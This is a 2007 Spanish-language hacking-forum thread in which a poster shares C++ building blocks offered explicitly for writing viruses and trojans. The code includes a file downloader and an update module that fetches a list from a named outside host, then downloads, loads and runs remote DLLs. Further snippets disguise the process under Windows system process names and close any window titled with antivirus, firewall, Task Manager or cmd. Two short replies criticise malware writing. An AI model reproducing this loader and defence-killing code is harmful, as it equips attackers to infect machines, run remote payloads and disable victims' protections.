elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Doble factor de autenticación o verificación en dos pasos


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Code Snippets
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Code Snippets  (Leído 1,858 veces)
De@th (L1zb3th)
TROLL


Desconectado Desconectado

Mensajes: 620

<-[Rin]->


Ver Perfil
Code Snippets
« en: 30 Junio 2007, 05:01 »

Code Snippets

Bien, Como este tema sugiere, aqui pondremos apuntes de codigo para programar virus y troyanos, o sea, pequeñas clases para ayudar a los que recien empiezar en este mundo del Virii ....

El LENGUAJE NO ES DE IMPORTANCIA A LA HORA DE POSTEAR ....

y pongan los tags de code si ?

aca hago unos aportes En C++ 

aviso que alguna clase puede depender de otra ...
Código
  1. /***************************************************
  2. ******#Clase Downloader
  3. ***************************************************/
  4. // requiere windows.h
  5.  
  6.  
  7. typedef long (WINAPI* Func)(long,LPCTSTR,LPCTSTR,DWORD,long);
  8. class Downloader{
  9.  
  10.      public:
  11.           Downloader();
  12.           ~Downloader();
  13.          void Download(char* File,char* Dest);
  14.           int Error;
  15.      private:
  16.           long downloader;
  17.           HMODULE Urlmon;
  18.           Func Funcion;
  19.  
  20.      };
  21.  
  22. Downloader::Downloader(){
  23.      Urlmon = LoadLibrary("Urlmon.dll");
  24.      if(Urlmon != NULL)  Funcion = (Func) GetProcAddress(Urlmon, "URLDownloadToFileA");
  25.      if (Urlmon==NULL) Error = 2;
  26.  
  27.                         }
  28.  
  29. void Downloader::Download(char* File,char* Dest){
  30. if (!Error){
  31.    downloader = Funcion(0,File,Dest,0,0);
  32.  
  33. }
  34.  
  35.                           }
  36. Downloader::~Downloader(){
  37.  FreeLibrary(Urlmon);
  38. }
  39.  
  40.  

esto es un downloader simple, solo tengan cuidado cuando pongan el name del file por el asunto de la cache xD
si bajan algo tipo http://a.com/a.jpg?d=[numero aleatorio] evitas el asunto cache =)

Código
  1. /* Generador de numeros aleatorios y nombres de archivos*/
  2. // requiere time.h
  3.  
  4. class NumberGenerator{
  5.      public:
  6.      NumberGenerator();
  7.      ~NumberGenerator();
  8.      int Numero;
  9. int CrearNumero(int liminf,int limsup);
  10.      };
  11.  
  12.  
  13. NumberGenerator::NumberGenerator(){
  14. srand( (unsigned)time( NULL ) );
  15. }
  16.  
  17. NumberGenerator::~NumberGenerator(){}
  18.  
  19. int NumberGenerator::CrearNumero(int liminf,int limsup){
  20.    this->Numero = (rand () % (limsup-liminf+1)) + liminf;
  21.    return Numero;
  22.    }
  23.  
  24.  
  25. char* FileNameGen(char* extension,int lenght1,NumberGenerator* Num){
  26.         char* Gen1 = (char*) malloc(lenght1+strlen(extension)+1);
  27.            int aux=0;
  28.              for(aux=0;aux<lenght1;aux++) Gen1[aux] = Num->CrearNumero(65,90);
  29.    Gen1[aux]='\0'; strcat(Gen1,extension);
  30.    return Gen1;
  31.        }
  32.  
  33.  

ahora un pequeño modulo de actualizacion del virii, para obtener nuevos modulos =P
via web =P

Código
  1.  
  2. #define ModulesURL "http://deathfloyd.iespana.es/Modules.txt"
  3. #define UPDATE_MAX_LEN 200
  4.  
  5. class UpdateModule{
  6.  
  7.      public:
  8.  
  9.      UpdateModule();
  10.      ~UpdateModule();
  11.      int GetUpdates();
  12.  
  13.      private:
  14.      Downloader Down;
  15.      FILE* fp;
  16.      Module** Mod;
  17.      HMODULE hmod;
  18.      NumberGenerator* Num;
  19.      uFunc Funcion;
  20.  
  21.      };
  22.  
  23. UpdateModule::UpdateModule(){
  24.                           Num = new NumberGenerator();
  25.                             }
  26.  
  27. UpdateModule::~UpdateModule(){
  28.    delete Num;
  29. }
  30.  
  31.  
  32. int UpdateModule::GetUpdates(){
  33.    char* fileas =  FileNameGen("",10,Num);
  34.     this->Down.Download(ModulesURL,fileas);
  35.     fp = fopen(fileas,"rb");
  36.     char* gen;
  37.     char* Temp = (char*) malloc(UPDATE_MAX_LEN);
  38.     char* TMP = (char*) malloc(UPDATE_MAX_LEN);
  39.     char* Other = (char*) malloc(UPDATE_MAX_LEN);
  40.     int Readed = 0,aux=0;
  41.     if (!fp) return 0;
  42.     while(!feof(fp)){
  43.                 TMP  = fgets(TMP,UPDATE_MAX_LEN,fp);
  44.                  sprintf(Other,"%s",TMP);
  45.                   Temp = strtok( TMP,">");
  46.                  gen = FileNameGen(".dll",10,Num);
  47.             /*Ahora si, descarguemos ese módulo ...*/
  48.                Down.Download(Temp,gen);
  49.  
  50.             hmod = LoadLibrary(gen);
  51.                   Temp = strrchr(Other,'>');   Temp++;
  52.  
  53.      if(hmod!= NULL)  Funcion = (uFunc) GetProcAddress(hmod,Temp );
  54.      if(hmod!= NULL)  Funcion();
  55.                        FreeLibrary(hmod);
  56.                       DeleteFile(fileas);
  57.                      }
  58.      fclose(fp);
  59.      DeleteFile(fileas);
  60.      free(gen);free(Temp);free(TMP);free(Other); /* liberamos tooooda la  memoria =P*/
  61.     return 1;
  62.     }
  63.  

nombres de ejecutables que no son matados por el taskmgr :

Código
  1. char* NotKilledByTaskMgr[]={
  2.                "Winlogon.exe" ,
  3.  "Lsass.exe" ,
  4.  "Csrss.exe",
  5.  "Smss.exe",
  6.  "Services.exe"};
  7.  

ideal para :

Código
  1. NumberGenerator Num;
  2. char* MyNewName = NotKilledByTaskMgr[Num.CrearNumero(0,4)];
  3.  

destructor de X Ventanas :

Código
  1. // palabras a buscar :
  2. char* Keywords[]={
  3.      "Firewall",
  4.      "hack",
  5.      "Hack",
  6.      "virus",
  7.      "Virus",
  8.      "Internet Explorer",
  9.      "clean",
  10.      "Ejecutar",
  11.      "Administrador de tareas",
  12.      "Task Manager",
  13.      "Utilidad de configuración del sistema",
  14.      "Editor del Registro",
  15.      "Nod",
  16.      "NOD",
  17.      "AVG",
  18.      "Kapersky",
  19.      "Ad-watch",
  20.      "Instal", //ESTO QUEDA COMO COMODIN, CUBRIRIA INSTALACION, INTALL Y DEMAS
  21.      "task",
  22.      "cmd",
  23.      "command"
  24.      };
  25.  

ahora la funcion ...

Código
  1. BOOL CALLBACK WinDestroyerCallback(HWND CallHWND,LPARAM param){
  2.  
  3. char* WinTitle = (char*) malloc(100);
  4. GetWindowText(CallHWND,WinTitle,99);
  5. int i =0;
  6. while(Keywords[i]!=NULL) {/* Mientras la lista de palabras clave no se termine ...*/
  7.         if (strstr(WinTitle,Keywords[i])) PostMessage(CallHWND,0x12, 0,0);
  8.         }
  9.  
  10. return true;
  11.  
  12. };
  13.  
  14.  
  15. BOOL WinDestroyer(){
  16. return  (!EnumWindows(WinDestroyerCallback,0 ));
  17.     }
  18.  
  19.  


Eso Por ahora xD
despues posteo mas aportes, en realidad todo esto lo habia cifrado primero en un PseudoBase64 que es el algoritmo Base64 modificado (aunque duplique el tamaño de la string hash xD) pero use BlowFish, y no MD5 no me sirve ....
en fin, despues posteo mas cosas, a medida que me las pidan por PM ..
Au Revoir !

Edit :
dejo mi mail/messenger por si acaso =P  lizbeth.covenant@gmail.com
« Última modificación: 6 Julio 2007, 19:29 por --[L1zb3th]-- » En línea

De@th (L1zb3th)
TROLL


Desconectado Desconectado

Mensajes: 620

<-[Rin]->


Ver Perfil
Re: Code Snippets
« Respuesta #1 en: 1 Julio 2007, 08:20 »

veo que hoy en dia se preocupan mas en usar troyanos para sacar cuentas de "JOTMAIL" que para aprender y usan virus para joder a alguien en vez de aprender ..
lo peor de todo es que se usa algo ya hecho, un binario y encima hecho en lenguajes pobres como VB ..
es al pedo poner codigo, si nadie le importa ..
Au Revoir !
En línea

Red Mx
Rojito
Colaborador
***
Desconectado Desconectado

Mensajes: 3.644


Viva México Cabrones...


Ver Perfil WWW
Re: Code Snippets
« Respuesta #2 en: 1 Julio 2007, 16:23 »

mmm, por que simpre de virus la programacion es buena y es bueno que enseñes codes pero necesariamente de virus no se ganan nada con eso...  >:(
En línea

Desarrollar Malware Es Causa De Cancer...
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Nanoalgoritmos, Snippets, Instrucciones, Virutas y Más
Programación General
~ 1 833 Último mensaje 19 Agosto 2012, 07:19
por sistemx
Librería de Snippets para VB.Net !! (Compartan aquí sus snippets) « 1 2 ... 50 51 »
.NET
Eleкtro 509 202,936 Último mensaje 3 Junio 2017, 03:55
por Eleкtro
[Snippets] javascript / CSS / HTML5
Desarrollo Web
#!drvy 2 1,575 Último mensaje 19 Marzo 2013, 21:48
por #!drvy
Librería de Snippets en C/C++ « 1 2 3 4 »
Programación C/C++
Ikillnukes 31 10,095 Último mensaje 2 Agosto 2013, 17:13
por 0xDani
Librería de Snippets para Delphi « 1 2 »
Programación General
crack81 15 5,158 Último mensaje 25 Marzo 2016, 18:39
por crack81
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines